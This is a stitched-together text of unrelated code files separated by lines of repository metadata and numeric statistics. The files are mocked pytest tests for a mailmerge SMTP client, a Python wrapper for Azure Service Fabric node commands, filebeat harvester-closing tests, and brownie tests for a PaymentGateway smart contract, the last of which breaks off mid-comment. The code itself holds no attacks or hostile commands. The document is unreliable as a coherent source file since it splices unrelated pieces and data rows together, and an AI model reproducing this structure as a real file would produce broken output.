    message = email.message_from_string(u"Hello world")

    # Send a message
    sendmail_client.sendmail(
        sender="test@test.com",
        recipients=["test@test.com"],
        message=message,
    )

    # Verify SMTP library calls: no password prompt, plain SMTP used
    # (never SMTP_SSL), one message sent, and no login attempted.
    assert mock_getpass.call_count == 0
    assert mock_SMTP.call_count == 1
    assert mock_SMTP_SSL.call_count == 0
    smtp = mock_SMTP.return_value.__enter__.return_value
    assert smtp.sendmail.call_count == 1
    assert smtp.login.call_count == 0
@mock.patch('smtplib.SMTP')
def test_security_open_legacy(mock_SMTP, tmp_path):
    """Verify legacy "security = Never" configuration."""
    # Config SMTP server with "security = Never" legacy option
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = open-smtp.example.com
        port = 25
        security = Never
    """))

    # Simple template
    sendmail_client = SendmailClient(config_path, dry_run=False)
    message = email.message_from_string(u"Hello world")

    # Send a message
    sendmail_client.sendmail(
        sender="test@test.com",
        recipients=["test@test.com"],
        message=message,
    )

    # Verify SMTP library calls: exactly one message went out over the
    # plain (unauthenticated) connection.
    smtp = mock_SMTP.return_value.__enter__.return_value
    assert smtp.sendmail.call_count == 1
@mock.patch('smtplib.SMTP')
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_security_starttls(mock_getpass, mock_SMTP_SSL, mock_SMTP, tmp_path):
    """Verify STARTTLS security configuration.

    A STARTTLS server must be reached with plain smtplib.SMTP (never
    SMTP_SSL), upgraded with the EHLO/STARTTLS/EHLO handshake, and
    logged into with the password collected from getpass.

    Note: mock.patch decorators apply bottom-up, so the mock arguments
    arrive in reverse decorator order.
    """
    # Config for STARTTLS SMTP server
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = newman.eecs.umich.edu
        port = 25
        security = STARTTLS
        username = YOUR_USERNAME_HERE
    """))

    # Simple message
    sendmail_client = SendmailClient(config_path, dry_run=False)
    message = email.message_from_string(u"Hello world")

    # Mock the password entry
    mock_getpass.return_value = "password"

    # Send a message
    sendmail_client.sendmail(
        sender="test@test.com",
        recipients=["test@test.com"],
        message=message,
    )

    # Verify SMTP library calls: password prompted once, plain SMTP used,
    # no SSL connection created, and the STARTTLS handshake performed
    # (EHLO before and after upgrading the connection).
    assert mock_getpass.call_count == 1
    assert mock_SMTP.call_count == 1
    assert mock_SMTP_SSL.call_count == 0
    smtp = mock_SMTP.return_value.__enter__.return_value
    assert smtp.ehlo.call_count == 2
    assert smtp.starttls.call_count == 1
    assert smtp.login.call_count == 1
    assert smtp.sendmail.call_count == 1
@mock.patch('smtplib.SMTP')
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_security_ssl(mock_getpass, mock_SMTP_SSL, mock_SMTP, tmp_path):
    """Verify SSL/TLS security configuration.

    An SSL/TLS server must be reached with smtplib.SMTP_SSL (never plain
    SMTP), with no EHLO/STARTTLS handshake, and logged into with the
    password collected from getpass.

    Note: mock.patch decorators apply bottom-up, so the mock arguments
    arrive in reverse decorator order.
    """
    # Config for SSL SMTP server
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = smtp.mail.umich.edu
        port = 465
        security = SSL/TLS
        username = YOUR_USERNAME_HERE
    """))

    # Simple message
    sendmail_client = SendmailClient(config_path, dry_run=False)
    message = email.message_from_string(u"Hello world")

    # Mock the password entry
    mock_getpass.return_value = "password"

    # Send a message
    sendmail_client.sendmail(
        sender="test@test.com",
        recipients=["test@test.com"],
        message=message,
    )

    # Verify SMTP library calls: password prompted once, SMTP_SSL used,
    # plain SMTP never created, no STARTTLS handshake, one login and
    # one sendmail on the secure connection.
    assert mock_getpass.call_count == 1
    assert mock_SMTP.call_count == 0
    assert mock_SMTP_SSL.call_count == 1
    smtp = mock_SMTP_SSL.return_value.__enter__.return_value
    assert smtp.ehlo.call_count == 0
    assert smtp.starttls.call_count == 0
    assert smtp.login.call_count == 1
    assert smtp.sendmail.call_count == 1
def test_missing_username(tmp_path):
    """Verify exception on missing username."""
    # SSL/TLS requires authentication; omitting `username` must make
    # client construction fail.
    config = tmp_path / "server.conf"
    content = textwrap.dedent(u"""\
        [smtp_server]
        host = smtp.mail.umich.edu
        port = 465
        security = SSL/TLS
    """)
    config.write_text(content)
    with pytest.raises(MailmergeError):
        SendmailClient(config, dry_run=False)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_smtp_login_error(mock_getpass, mock_SMTP_SSL, tmp_path):
    """Login failure."""
    # mock.patch decorators apply bottom-up; mock_getpass comes first.
    # Config for SSL SMTP server
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = smtp.gmail.com
        port = 465
        security = SSL/TLS
        username = awdeorio
    """))

    # Simple template
    sendmail_client = SendmailClient(config_path, dry_run=False)
    message = email.message_from_string(u"Hello world")

    # Mock the password entry
    mock_getpass.return_value = "password"

    # Configure SMTP login() to raise an exception
    mock_SMTP_SSL.return_value.__enter__.return_value.login = mock.Mock(
        side_effect=smtplib.SMTPAuthenticationError(
            code=535,
            msg=(
                "5.7.8 Username and Password not accepted. Learn more at "
                "5.7.8 https://support.google.com/mail/?p=BadCredentials "
                "xyzxyz.32 - gsmtp"
            )
        )
    )

    # Send a message; the auth failure must surface as MailmergeError.
    with pytest.raises(MailmergeError) as err:
        sendmail_client.sendmail(
            sender="test@test.com",
            recipients=["test@test.com"],
            message=message,
        )

    # Verify exception string includes host, port, username, the SMTP
    # status code, and the server's full error text.
    assert "smtp.gmail.com:465 failed to authenticate user 'awdeorio'" in\
        str(err.value)
    assert "535" in str(err.value)
    assert (
        "5.7.8 Username and Password not accepted. Learn more at "
        "5.7.8 https://support.google.com/mail/?p=BadCredentials "
        "xyzxyz.32 - gsmtp"
    ) in str(err.value)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_smtp_sendmail_error(mock_getpass, mock_SMTP_SSL, tmp_path):
    """Failure during SMTP protocol."""
    # mock.patch decorators apply bottom-up; mock_getpass comes first.
    # Config for SSL SMTP server
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = smtp.gmail.com
        port = 465
        security = SSL/TLS
        username = awdeorio
    """))

    # Simple template
    sendmail_client = SendmailClient(config_path, dry_run=False)
    message = email.message_from_string(u"Hello world")

    # Mock the password entry
    mock_getpass.return_value = "password"

    # Configure SMTP sendmail() to raise an exception
    mock_SMTP_SSL.return_value.__enter__.return_value.sendmail = mock.Mock(
        side_effect=smtplib.SMTPException("Dummy error message")
    )

    # Send a message; the protocol error must surface as MailmergeError.
    with pytest.raises(MailmergeError) as err:
        sendmail_client.sendmail(
            sender="test@test.com",
            recipients=["test@test.com"],
            message=message,
        )

    # Verify exception string preserves the underlying SMTP error text.
    assert "Dummy error message" in str(err.value)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_socket_error(mock_getpass, mock_SMTP_SSL, tmp_path):
    """Failed socket connection."""
    # mock.patch decorators apply bottom-up; mock_getpass comes first.
    # Config for SSL SMTP server
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = smtp.gmail.com
        port = 465
        security = SSL/TLS
        username = awdeorio
    """))

    # Simple template
    sendmail_client = SendmailClient(config_path, dry_run=False)
    message = email.message_from_string(u"Hello world")

    # Mock the password entry
    mock_getpass.return_value = "password"

    # Configure SMTP_SSL constructor to raise an exception
    # (the context-manager __enter__ fails, simulating a connect error).
    mock_SMTP_SSL.return_value.__enter__ = mock.Mock(
        side_effect=socket.error("Dummy error message")
    )

    # Send a message; the socket error must surface as MailmergeError.
    with pytest.raises(MailmergeError) as err:
        sendmail_client.sendmail(
            sender="test@test.com",
            recipients=["test@test.com"],
            message=message,
        )

    # Verify exception string preserves the underlying socket error text.
    assert "Dummy error message" in str(err.value)
| 29.43418 | 77 | 0.663162 | 1,613 | 12,745 | 5.024799 | 0.107874 | 0.048118 | 0.024429 | 0.032079 | 0.858112 | 0.83467 | 0.811845 | 0.789636 | 0.771129 | 0.763726 | 0 | 0.008448 | 0.229109 | 12,745 | 432 | 78 | 29.502315 | 0.816489 | 0.141703 | 0 | 0.762376 | 0 | 0 | 0.28648 | 0.013585 | 0 | 0 | 0 | 0 | 0.09901 | 1 | 0.042904 | false | 0.09571 | 0.033003 | 0 | 0.075908 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
5518c7fe6b8786208a806aab1825f452f29fb4dc | 2,302 | py | Python | pyaz/sf/managed_node_type/node/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/sf/managed_node_type/node/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/sf/managed_node_type/node/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | 1 | 2022-02-03T09:12:01.000Z | 2022-02-03T09:12:01.000Z | from .... pyaz_utils import _call_az
def reimage(cluster_name, node_name, resource_group, force=None):
    '''
    Reimage nodes of a node type.

    Required Parameters:
    - cluster_name -- Specify the name of the cluster, if not given it will be same as resource group name
    - node_name -- list of target nodes to perform the operation.
    - resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`

    Optional Parameters:
    - force -- Using this flag will force the operation even if service fabric is unable to disable the nodes. Use with caution as this might cause data loss if stateful workloads are running on the node.
    '''
    # Build the argument mapping explicitly (instead of locals()) so the
    # call is unaffected by any temporaries introduced later.
    arguments = {
        'cluster_name': cluster_name,
        'node_name': node_name,
        'resource_group': resource_group,
        'force': force,
    }
    return _call_az("az sf managed-node-type node reimage", arguments)
def restart(cluster_name, node_name, resource_group, force=None):
    '''
    Restart nodes of a node type.

    Required Parameters:
    - cluster_name -- Specify the name of the cluster, if not given it will be same as resource group name
    - node_name -- list of target nodes to perform the operation.
    - resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`

    Optional Parameters:
    - force -- Using this flag will force the operation even if service fabric is unable to disable the nodes. Use with caution as this might cause data loss if stateful workloads are running on the node.
    '''
    # Build the argument mapping explicitly (instead of locals()) so the
    # call is unaffected by any temporaries introduced later.
    arguments = {
        'cluster_name': cluster_name,
        'node_name': node_name,
        'resource_group': resource_group,
        'force': force,
    }
    return _call_az("az sf managed-node-type node restart", arguments)
def delete(cluster_name, node_name, resource_group, force=None):
    '''
    Delete nodes of a node type.

    Required Parameters:
    - cluster_name -- Specify the name of the cluster, if not given it will be same as resource group name
    - node_name -- list of target nodes to perform the operation.
    - resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`

    Optional Parameters:
    - force -- Using this flag will force the operation even if service fabric is unable to disable the nodes. Use with caution as this might cause data loss if stateful workloads are running on the node.
    '''
    # Build the argument mapping explicitly (instead of locals()) so the
    # call is unaffected by any temporaries introduced later.
    arguments = {
        'cluster_name': cluster_name,
        'node_name': node_name,
        'resource_group': resource_group,
        'force': force,
    }
    return _call_az("az sf managed-node-type node delete", arguments)
| 48.978723 | 204 | 0.730235 | 348 | 2,302 | 4.752874 | 0.198276 | 0.094317 | 0.043531 | 0.034462 | 0.932285 | 0.932285 | 0.932285 | 0.932285 | 0.85792 | 0.85792 | 0 | 0 | 0.20417 | 2,302 | 46 | 205 | 50.043478 | 0.902838 | 0.747176 | 0 | 0 | 0 | 0 | 0.231102 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0.142857 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
9b9adbede115a898f64ec80d2fb7233aa34ccc40 | 3,904 | py | Python | filebeat/tests/system/test_harvester.py | douaejeouit/Docker_metricbeat | e6c80264d3686939fc4451c358fb8ae8d973650c | [
"Apache-2.0"
] | 3 | 2017-08-08T20:08:53.000Z | 2021-09-16T14:38:00.000Z | filebeat/tests/system/test_harvester.py | douaejeouit/Docker_metricbeat | e6c80264d3686939fc4451c358fb8ae8d973650c | [
"Apache-2.0"
] | 1 | 2016-07-19T09:33:37.000Z | 2016-07-19T10:29:54.000Z | filebeat/tests/system/test_harvester.py | douaejeouit/Docker_metricbeat | e6c80264d3686939fc4451c358fb8ae8d973650c | [
"Apache-2.0"
] | 7 | 2017-11-24T23:58:46.000Z | 2020-03-31T15:57:07.000Z | from filebeat import BaseTest
import os
import socket
"""
Test Harvesters
"""
class Test(BaseTest):
    """System tests for the filebeat harvester close_* options."""

    @staticmethod
    def _write_log_lines(path, count, line="rotation file"):
        # Shared helper: write `count` newline-terminated copies of `line`
        # to `path` (replaces the write loop duplicated in every test).
        with open(path, 'w') as f:
            for _ in range(count):
                f.write(line + "\n")

    def test_close_renamed(self):
        """
        Checks that a file is closed when it is renamed / rotated
        """
        self.render_config_template(
            path=os.path.abspath(self.working_dir) + "/log/test.log",
            close_renamed="true",
            scan_frequency="0.1s"
        )
        os.mkdir(self.working_dir + "/log/")
        testfile1 = self.working_dir + "/log/test.log"
        testfile2 = self.working_dir + "/log/test.log.rotated"

        iterations1 = 5
        self._write_log_lines(testfile1, iterations1)

        filebeat = self.start_beat()

        # Let it read the file
        self.wait_until(
            lambda: self.output_has(lines=iterations1), max_timeout=10)

        os.rename(testfile1, testfile2)

        # Bug fix: the original used open(testfile1, 'w', 0) (unbuffered),
        # a Python 2 idiom that raises ValueError for text mode on Python 3;
        # the immediate close() flushes the data either way.
        with open(testfile1, 'w') as f:
            f.write("Hello World\n")

        # Wait until the close event shows up
        self.wait_until(
            lambda: self.log_contains(
                "Closing because close_renamed is enabled"),
            max_timeout=15)

        # Let it read the new file
        self.wait_until(
            lambda: self.output_has(lines=iterations1 + 1), max_timeout=10)

        filebeat.check_kill_and_wait()

        data = self.get_registry()

        # Make sure new file was picked up. As it has the same file name,
        # one entry for the new and one for the old should exist
        assert len(data) == 2

    def test_close_removed(self):
        """
        Checks that a file is closed if removed
        """
        self.render_config_template(
            path=os.path.abspath(self.working_dir) + "/log/test.log",
            close_removed="true",
            scan_frequency="0.1s"
        )
        os.mkdir(self.working_dir + "/log/")
        testfile1 = self.working_dir + "/log/test.log"

        iterations1 = 5
        self._write_log_lines(testfile1, iterations1)

        filebeat = self.start_beat()

        # Let it read the file
        self.wait_until(
            lambda: self.output_has(lines=iterations1), max_timeout=10)

        os.remove(testfile1)

        # Wait until the close event shows up (can take longer on windows)
        self.wait_until(
            lambda: self.log_contains(
                "Closing because close_removed is enabled"),
            max_timeout=15)

        filebeat.check_kill_and_wait()

        data = self.get_registry()

        # Make sure the state for the file was persisted
        assert len(data) == 1

    def test_close_eof(self):
        """
        Checks that a file is closed if eof is reached
        """
        self.render_config_template(
            path=os.path.abspath(self.working_dir) + "/log/test.log",
            close_eof="true",
            scan_frequency="0.1s"
        )
        os.mkdir(self.working_dir + "/log/")
        testfile1 = self.working_dir + "/log/test.log"

        iterations1 = 5
        self._write_log_lines(testfile1, iterations1)

        filebeat = self.start_beat()

        # Let it read the file
        self.wait_until(
            lambda: self.output_has(lines=iterations1), max_timeout=10)

        # Wait until the close event shows up (can take longer on windows)
        self.wait_until(
            lambda: self.log_contains(
                "Closing because close_eof is enabled"),
            max_timeout=15)

        filebeat.check_kill_and_wait()

        data = self.get_registry()

        # Make sure the state for the file was persisted
        assert len(data) == 1
| 26.201342 | 75 | 0.567623 | 479 | 3,904 | 4.48643 | 0.221294 | 0.051187 | 0.065147 | 0.079107 | 0.805956 | 0.786412 | 0.775244 | 0.76268 | 0.735691 | 0.735691 | 0 | 0.019885 | 0.330174 | 3,904 | 148 | 76 | 26.378378 | 0.801912 | 0.13832 | 0 | 0.72619 | 0 | 0 | 0.096903 | 0.00644 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.035714 | false | 0 | 0.035714 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
32d7866d4d9e6ebcb90e1b1bf355fc6a65c629ff | 19,373 | py | Python | tests/payment/test_PaymentGateway.py | BoostryJP/ibet-SmartContract | dc3f73a708ef145e7200ce58fce4e8171e21d3c2 | [
"Apache-2.0"
] | 10 | 2021-06-12T08:43:50.000Z | 2022-02-17T14:24:48.000Z | tests/payment/test_PaymentGateway.py | BoostryJP/ibet-SmartContract | dc3f73a708ef145e7200ce58fce4e8171e21d3c2 | [
"Apache-2.0"
] | 44 | 2021-04-11T06:43:10.000Z | 2022-03-30T12:42:32.000Z | tests/payment/test_PaymentGateway.py | BoostryJP/ibet-SmartContract | dc3f73a708ef145e7200ce58fce4e8171e21d3c2 | [
"Apache-2.0"
] | 1 | 2022-03-09T07:27:57.000Z | 2022-03-09T07:27:57.000Z | """
Copyright BOOSTRY Co., Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import brownie
encrypted_message = 'encrypted_message'
encrypted_message_after = 'encrypted_message_after'
terms_text = 'terms_sample\nend'
terms_text_after = 'terms_sample\nafter\nend'
# TEST_deploy
class TestDeploy:
    """Deployment: contract storage must start empty."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    def test_normal_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # assertion: no payment account is registered yet
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == brownie.ZERO_ADDRESS
        assert acct[1] == brownie.ZERO_ADDRESS
        assert acct[2] == ''
        assert acct[3] == 0
        assert pg.accountApproved(trader, agent) is False
# TEST_register
class TestRegister:
    """Tests for PaymentGateway.register."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    def test_normal_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register
        tx = pg.register.transact(agent, encrypted_message, {'from': trader})

        # assertion: account stored with status REGISTERED (1)
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message
        assert acct[3] == 1
        assert pg.accountApproved(trader, agent) is False
        assert tx.events['Register']['account_address'] == trader.address
        assert tx.events['Register']['agent_address'] == agent.address

    # Normal_2
    # Multiple registrations
    def test_normal_2(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register twice: the second call overwrites the encrypted message
        pg.register.transact(agent, encrypted_message, {'from': trader})
        pg.register.transact(agent, encrypted_message_after, {'from': trader})

        # assertion
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message_after
        assert acct[3] == 1
        assert pg.accountApproved(trader, agent) is False

    #######################################
    # Error
    #######################################

    # Error_1
    # If approval_status = 4 (BAN), registration is not possible.
    def test_error_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register, then ban the account
        pg.register.transact(agent, encrypted_message, {'from': trader})
        pg.ban.transact(trader, {'from': agent})

        # a banned account must not be able to re-register
        with brownie.reverts():
            pg.register.transact(agent, encrypted_message_after, {'from': trader})

        # assertion: state unchanged, status stays BAN (4)
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message
        assert acct[3] == 4
        assert pg.accountApproved(trader, agent) is False
# TEST_modify
class TestModify:
    """Tests for PaymentGateway.modify."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    def test_normal_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register, then let the agent modify the encrypted message
        pg.register.transact(agent, encrypted_message, {'from': trader})
        tx = pg.modify.transact(trader, encrypted_message_after, {'from': agent})

        # assertion
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message_after
        assert acct[3] == 1
        assert tx.events['Modify']['account_address'] == trader.address
        assert tx.events['Modify']['agent_address'] == agent.address

    #######################################
    # Error
    #######################################

    # Error_1
    # Not registered
    def test_error_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # modifying an unregistered account must revert
        with brownie.reverts():
            pg.modify.transact(trader, encrypted_message_after, {'from': agent})

        # assertion: storage untouched
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == brownie.ZERO_ADDRESS
        assert acct[1] == brownie.ZERO_ADDRESS
        assert acct[2] == ''
        assert acct[3] == 0

    # Error_2
    # Unauthorized
    def test_error_2(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register
        pg.register.transact(agent, encrypted_message, {'from': trader})

        # only the agent may modify; the trader itself must be rejected
        with brownie.reverts():
            pg.modify.transact(trader, encrypted_message_after, {'from': trader})

        # assertion: original message retained
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message
        assert acct[3] == 1
# TEST_approve
class TestApprove:
    """Tests for PaymentGateway.approve."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    def test_normal_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register, then approve
        pg.register.transact(agent, encrypted_message, {'from': trader})
        tx = pg.approve.transact(trader, {'from': agent})

        # assertion: status moves to APPROVED (2)
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message
        assert acct[3] == 2
        assert pg.accountApproved(trader, agent) is True
        assert tx.events['Approve']['account_address'] == trader.address
        assert tx.events['Approve']['agent_address'] == agent.address

    #######################################
    # Error
    #######################################

    # Error_1
    # Not registered
    def test_error_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # approving an unregistered account must revert
        with brownie.reverts():
            pg.approve.transact(trader, {'from': agent})

        # assertion
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == brownie.ZERO_ADDRESS
# TEST_warn
class TestWarn:
    """Tests for PaymentGateway.warn."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    def test_normal_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register, then warn
        pg.register.transact(agent, encrypted_message, {'from': trader})
        tx = pg.warn.transact(trader, {'from': agent})

        # assertion: status moves to WARN (3), account not approved
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message
        assert acct[3] == 3
        assert pg.accountApproved(trader, agent) is False
        assert tx.events['Warn']['account_address'] == trader.address
        assert tx.events['Warn']['agent_address'] == agent.address

    #######################################
    # Error
    #######################################

    # Error_1
    # Not registered
    def test_error_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # warning an unregistered account must revert
        with brownie.reverts():
            pg.warn.transact(trader, {'from': agent})

        # assertion
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == brownie.ZERO_ADDRESS
# TEST_disapprove
class TestDisapprove:
    """Tests for PaymentGateway.disapprove."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    def test_normal_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register, then disapprove
        pg.register.transact(agent, encrypted_message, {'from': trader})
        tx = pg.disapprove.transact(trader, {'from': agent})

        # assertion: status is REGISTERED (1), not approved
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message
        assert acct[3] == 1
        assert pg.accountApproved(trader, agent) is False
        assert tx.events['Disapprove']['account_address'] == trader.address
        assert tx.events['Disapprove']['agent_address'] == agent.address

    # Normal_2
    # register -> approve -> disapprove
    def test_normal_2(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register, approve, then disapprove again
        pg.register.transact(agent, encrypted_message, {'from': trader})
        pg.approve.transact(trader, {'from': agent})
        pg.disapprove.transact(trader, {'from': agent})

        # assertion: disapprove undoes the approval
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message
        assert acct[3] == 1
        assert pg.accountApproved(trader, agent) is False

    #######################################
    # Error
    #######################################

    # Error_1
    # Not registered
    def test_error_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # disapproving an unregistered account must revert
        with brownie.reverts():
            pg.disapprove.transact(trader, {'from': agent})

        # assertion
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == brownie.ZERO_ADDRESS
# TEST_ban
class TestBan:
    """Tests for PaymentGateway.ban."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    def test_normal_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # register, then ban
        pg.register.transact(agent, encrypted_message, {'from': trader})
        tx = pg.ban.transact(trader, {'from': agent})

        # assertion: status moves to BAN (4)
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == trader
        assert acct[1] == agent
        assert acct[2] == encrypted_message
        assert acct[3] == 4
        assert pg.accountApproved(trader, agent) is False
        assert tx.events['Ban']['account_address'] == trader.address
        assert tx.events['Ban']['agent_address'] == agent.address

    #######################################
    # Error
    #######################################

    # Error_1
    # Not registered
    def test_error_1(self, PaymentGateway, users):
        admin, trader, agent = users['admin'], users['trader'], users['agent']

        # deploy
        pg = admin.deploy(PaymentGateway)

        # banning an unregistered account must revert
        with brownie.reverts():
            pg.ban.transact(trader, {'from': agent})

        # assertion
        acct = pg.payment_accounts(trader, agent)
        assert acct[0] == brownie.ZERO_ADDRESS
# TEST_addAgent
class TestAddAgent:
    """Tests for PaymentGateway.addAgent."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    # Default value
    def test_normal_1(self, PaymentGateway, users):
        admin = users['admin']

        # deploy
        pg_contract = admin.deploy(PaymentGateway)

        # assertion
        # Fix: compare booleans with `is` (E712) for consistency with the
        # `is False` style used by the other test classes in this file.
        agent_available = pg_contract.getAgent(brownie.ZERO_ADDRESS)
        assert agent_available is False

    # Normal_2
    # Add new agent
    def test_normal_2(self, PaymentGateway, users):
        admin = users['admin']
        agent = users['agent']

        # deploy
        pg_contract = admin.deploy(PaymentGateway)

        # add agent
        tx = pg_contract.addAgent.transact(agent, {'from': admin})

        # assertion
        agent_available = pg_contract.getAgent(agent)
        assert agent_available is True
        assert tx.events['AddAgent']['agent_address'] == agent.address

    # Normal_3
    # Add multiple agents
    def test_normal_3(self, PaymentGateway, users):
        admin = users['admin']
        agent_1 = users['user1']
        agent_2 = users['user2']

        # deploy
        pg_contract = admin.deploy(PaymentGateway)

        # add agent 1
        pg_contract.addAgent.transact(agent_1, {'from': admin})

        # add agent 2
        pg_contract.addAgent.transact(agent_2, {'from': admin})

        # assertion
        assert pg_contract.getAgent(agent_1) is True
        assert pg_contract.getAgent(agent_2) is True

    #######################################
    # Error
    #######################################

    # Error_1
    # Unauthorized
    def test_error_1(self, PaymentGateway, users):
        admin = users['admin']
        attacker = users['trader']
        agent = users['agent']

        # deploy
        pg_contract = admin.deploy(PaymentGateway)

        # adding an agent from a non-admin account must revert
        with brownie.reverts():
            pg_contract.addAgent.transact(agent, {'from': attacker})

        # assertion
        assert pg_contract.getAgent(agent) is False
# TEST_removeAgent
class TestRemoveAgent:
    """Tests for PaymentGateway.removeAgent."""

    #######################################
    # Normal
    #######################################

    # Normal_1
    # No data
    def test_normal_1(self, PaymentGateway, users):
        admin = users['admin']
        agent = users['agent']

        # deploy
        pg_contract = admin.deploy(PaymentGateway)

        # remove an agent that was never added: no-op, but the event still fires
        tx = pg_contract.removeAgent.transact(agent, {'from': admin})

        # assertion
        # Fix: compare booleans with `is` (E712) for consistency with the
